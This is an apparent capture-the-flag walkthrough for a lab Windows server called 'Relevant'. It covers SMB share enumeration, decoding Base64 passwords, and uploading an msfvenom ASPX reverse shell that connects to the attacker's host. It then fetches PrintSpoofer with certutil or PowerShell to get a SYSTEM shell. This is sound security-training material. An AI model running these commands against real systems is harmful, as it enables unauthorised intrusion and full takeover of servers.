Relevant

advanced1h 10mWriteup

Penetration test on a Windows server

Learning Objectives

  • Enumerate SMB shares
  • Find credentials
  • Exploit web service
  • Windows privilege escalation

Relevant is a hard-rated penetration test simulation featuring SMB enumeration, encoded credential discovery, and Windows privilege escalation via SeImpersonatePrivilege (PrintSpoofer/JuicyPotato).

This room simulates a real engagement with minimal guidance. You'll need to think like an actual penetration tester and chain multiple vulnerabilities together.

Reconnaissance

bash
1606070;"># Comprehensive port scan (this box has services on high ports!)
2nmap -sV -sC -p- TARGET_IP
3606070;"># Results:
4606070;"># 80/tcp    - HTTP (IIS)
5606070;"># 135/tcp   - MSRPC
6606070;"># 139/tcp   - NetBIOS
7606070;"># 445/tcp   - SMB
8606070;"># 3389/tcp  - RDP
9606070;"># 49663/tcp - HTTP (IIS)
10606070;"># 49667/tcp - MSRPC
11606070;"># 49669/tcp - MSRPC
12 
13606070;"># Don't miss the high ports! Always scan all 65535
14606070;"># Port 49663 is another web server!
This box has important services on non-standard ports. A quick scan of common ports will miss critical attack vectors!

SMB Enumeration

bash
1606070;"># List SMB shares
2smbclient -L 606070;">//TARGET_IP -N
3606070;"># Sharename       Type
4606070;"># ---------       ----
5606070;"># ADMIN$          Disk
6606070;"># C$              Disk
7606070;"># IPC$            IPC
8606070;"># nt4wrksv        Disk    <- Interesting!
9 
10606070;"># Access the share
11smbclient 606070;">//TARGET_IP/nt4wrksv -N
12smb: \> ls
13smb: \> get passwords.txt
14 
15606070;"># View contents
16cat passwords.txt
17606070;"># [User Passwords - Encoded]
18606070;"># Qm9iIC0gIVBAJCRXMHJEITEyMw==
19606070;"># QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Base64 Detection

Strings ending in '==' or '=' are often Base64 encoded. The character set (A-Za-z0-9+/) is another giveaway. Always try decoding!
bash
1606070;"># Decode credentials
2echo 606070;">#a5d6ff;">'Qm9iIC0gIVBAJCRXMHJEITEyMw==' | base64 -d
3606070;"># Bob - !P@$$W0rD!123
4 
5echo 606070;">#a5d6ff;">'QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk' | base64 -d
6606070;"># Bill - Juw4nnaM4n420696969!$$$
7 
8606070;"># Try credentials
9crackmapexec smb TARGET_IP -u 606070;">#a5d6ff;">'Bob' -p '!P@$$W0rD!123'
10crackmapexec smb TARGET_IP -u 606070;">#a5d6ff;">'Bill' -p 'Juw4nnaM4n420696969!$$$'

Web Server Analysis

The key insight: the SMB share might be accessible via the web server!

bash
1606070;"># Check if SMB share is web-accessible
2606070;"># The nt4wrksv share might be served by IIS
3 
4curl http:606070;">//TARGET_IP:49663/nt4wrksv/
5606070;"># Directory listing!
6 
7606070;"># Upload a test file via SMB
8smbclient 606070;">//TARGET_IP/nt4wrksv -N
9smb: \> put test.txt
10 
11606070;"># Access via web
12curl http:606070;">//TARGET_IP:49663/nt4wrksv/test.txt
13606070;"># Works! We can upload and execute files!
When SMB shares are web-accessible, you can upload shells via SMB and execute them via HTTP. This is a common misconfiguration!

Getting a Shell

bash
1606070;"># Generate ASPX reverse shell (IIS uses .aspx)
2msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f aspx -o shell.aspx
3 
4606070;"># Upload via SMB
5smbclient 606070;">//TARGET_IP/nt4wrksv -N
6smb: \> put shell.aspx
7smb: \> quit
8 
9606070;"># Start listener
10nc -lvnp 4444
11 
12606070;"># Trigger shell via web
13curl http:606070;">//TARGET_IP:49663/nt4wrksv/shell.aspx
14 
15606070;"># Shell received as iis apppool\defaultapppool
16whoami
17606070;"># iis apppooldefaultapppool

Privilege Escalation

bash
1606070;"># Check privileges
2whoami /priv
3606070;"># Privilege Name                Description                               State
4606070;"># ============================= ========================================= =======
5606070;"># SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
6606070;"># SeCreateGlobalPrivilege       Create global objects                     Enabled
7606070;"># SeImpersonatePrivilege        Impersonate a client after authentication Enabled
8 
9606070;"># SeImpersonatePrivilege = Potato attacks!
SeImpersonatePrivilege is extremely powerful. It allows impersonating any token, including SYSTEM. Service accounts (like IIS AppPool) commonly have this privilege.

PrintSpoofer Exploitation

1
Download PrintSpooferGet PrintSpoofer64.exe from GitHub releases
2
Transfer to TargetUpload via SMB or PowerShell download
3
ExecuteRun PrintSpoofer to spawn SYSTEM shell
bash
1606070;"># On attacker: host PrintSpoofer
2python3 -m http.server 80
3 
4606070;"># On target: download
5certutil -urlcache -f http:606070;">//YOUR_IP/PrintSpoofer64.exe C:\Users\Public\PrintSpoofer64.exe
6 
7606070;"># Or via PowerShell
8powershell -c 606070;">#a5d6ff;">"Invoke-WebRequest -Uri http://YOUR_IP/PrintSpoofer64.exe -OutFile C:\Users\Public\PrintSpoofer64.exe"
9 
10606070;"># Execute PrintSpoofer
11C:\Users\Public\PrintSpoofer64.exe -i -c cmd
12606070;"># SYSTEM shell!
13 
14whoami
15606070;"># nt authoritysystem

Alternative: JuicyPotato

JuicyPotato is another option for SeImpersonatePrivilege abuse but requires finding a valid CLSID for the target Windows version. PrintSpoofer is often simpler and works on newer Windows versions.
bash
1606070;"># Get flags
2type C:\Users\Bob\Desktop\user.txt
3type C:\Users\Administrator\Desktop\root.txt

Knowledge Check

Quick Quiz
Question 1 of 2

What made the initial access possible?

Key Takeaways

  • Always scan all 65535 ports - critical services hide on high ports
  • Base64 encoded strings often contain credentials
  • SMB shares may be web-accessible, enabling upload-to-execute attacks
  • IIS AppPool accounts have SeImpersonatePrivilege by default
  • PrintSpoofer exploits SeImpersonatePrivilege for SYSTEM access